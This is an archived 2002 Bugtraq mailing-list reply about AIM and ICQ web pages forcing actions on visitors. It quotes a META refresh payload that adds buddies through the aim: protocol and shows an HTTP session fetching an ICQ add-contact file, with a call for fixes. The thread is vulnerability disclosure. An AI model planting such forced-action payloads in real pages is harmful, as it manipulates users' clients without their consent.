Bugtraq mailing list archives
Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code
From: "Bojidar Alexandrov" <bojo () kodar net>
Date: Thu, 18 Jul 2002 10:33:45 +0300
Knud, This issue is still here, only address that you use is not longer valid, because is changed... At end is the http session (for my icq beware :)). Also seems that no one take attention Jelmer's exploit for ICQ and MSIE. It must be examined througly for other variants and complete solution must be given to the comunity! ATTENTION it is a HIGH security risk for clients - it works with almost any ICQ and IE, and ICQ must be installed in default path, or script to "guess" where, but anyway this is a very common case. Http session for the icq: GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: bg,en-us;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: wwp.icq.com Proxy-Connection: Keep-Alive HTTP/1.0 200 OK Date: Thu, 18 Jul 2002 07:12:12 GMT Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR" Content-Type: application/x-icq Proxy-Connection: close <!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 --> [ICQ User] UIN=71398287 Email= NickName= FirstName= LastName= ----- Original Message ----- From: "Knud Erik Højgaard" <kain () egotrip dk> To: "orb" <orb () mindflip org>; <bugtraq () securityfocus com> Sent: Monday, July 16, 2001 11:44 PM Subject: Re: AIM forced behavior "issue"
Example <META
HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg
,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>A web page loaded with the above code in it's META REFRESH tag would automatically add a group to the users buddylist called mindfliporg and add buddy's mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.We tried some similar stuff with icq a while ago, live example at http://knudergud.dk/dev/icq.html .. it seems broken now, but the idea should be obvious. adding to a contact list using javascript, requiring no user interaction.. stupid software. -Knud
Current thread:
- AIM forced behavior "issue" orb (Jul 15)
- Re: AIM forced behavior "issue" Knud Erik Højgaard (Jul 16)
- Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code Bojidar Alexandrov (Jul 18)
- Re: AIM forced behavior "issue" Knud Erik Højgaard (Jul 16)